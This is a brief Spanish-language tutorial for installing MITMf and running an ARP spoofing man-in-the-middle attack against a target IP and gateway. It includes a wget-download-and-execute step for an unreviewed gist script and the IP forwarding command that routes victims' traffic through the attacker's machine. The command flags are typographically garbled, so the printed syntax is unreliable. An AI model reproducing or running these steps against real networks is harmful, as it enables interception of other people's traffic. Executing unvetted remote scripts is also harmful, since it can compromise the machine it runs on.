Para utilizar la herramienta MITMf, primero debemos instalarla, para ello, abrimos nuestro terminal y escribimos:
1- Iniciamos instalando pip2
wget https://gist.githubusercontent.com/anir0y/a20246e26dcb2ebf1b44a0e1d989f5d1/raw/a9908e5dd147f0b6eb71ec51f9845fafe7fb8a7f/pip2%2520install -O run.sh
chmod +x run.sh
./run.sh
2- Instalando todas las dependencias
sudo apt update && sudo apt upgrade
pip install setuptools
sudo apt install python2-dev libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone4 libcapstone-dev libffi-dev file
***git clone https://github.com/Radeonares32/MITMF.git***
3- Iniciar MITMf
cd MITMf
sudo python3 mitmf.py -h
Para ejecutarlo, utilizamos el siguiente comando:
mitmf –arp –spoof -i [interface] –target [client IP] –gateway [gateway IP]
Ejemplo: mitmf – -arp – – spoof -i eth0 – – target 10.0.2.4 – -gateway 10.0.2.1
Nota: Cada vez que realizamos un ataque MITM, no debemos olvidar ejecutar el comando de reenvío de puerto en la terminal. Este comando permite que el tráfico de la red fluya a través del equipo del atacante.
Ejemplo: echo 1 > /proc/sys/net/ipv4/ip_forward